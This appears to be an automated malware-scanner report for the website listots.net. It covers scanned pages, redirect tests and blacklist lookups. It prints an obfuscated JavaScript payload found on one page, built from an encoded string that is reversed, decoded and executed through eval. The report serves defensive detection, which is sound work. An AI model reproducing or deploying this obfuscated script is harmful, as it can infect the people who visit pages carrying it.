http://listots.net/index.php?byco=&oocoo=&page=3&lang=no	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=3 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=6ro6u6gm07ipbkel1isncp6nb7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19	clean
http://listots.net/index.php?byco=&oocoo=&page=4	200 OK Content-Length: 9667 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d ... 2243 bytes are skipped ...3=I0llOI.indexOf(data.charAt(i++));h4=I0llOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function I0l(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(O11(I0l(_1OI))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: listots.net

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 12:13:09 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=cc7ie2s6iel18fp69o9n841go2; path=/
X-Powered-By: PHP/5.3.3-7+squeeze19

Second query (visit from search engine):
GET / HTTP/1.1
Host: listots.net
Referer: http://www.google.com/search?q=listots.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=listots.net

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://listots.net/

Result: listots.net is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for listots.net

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools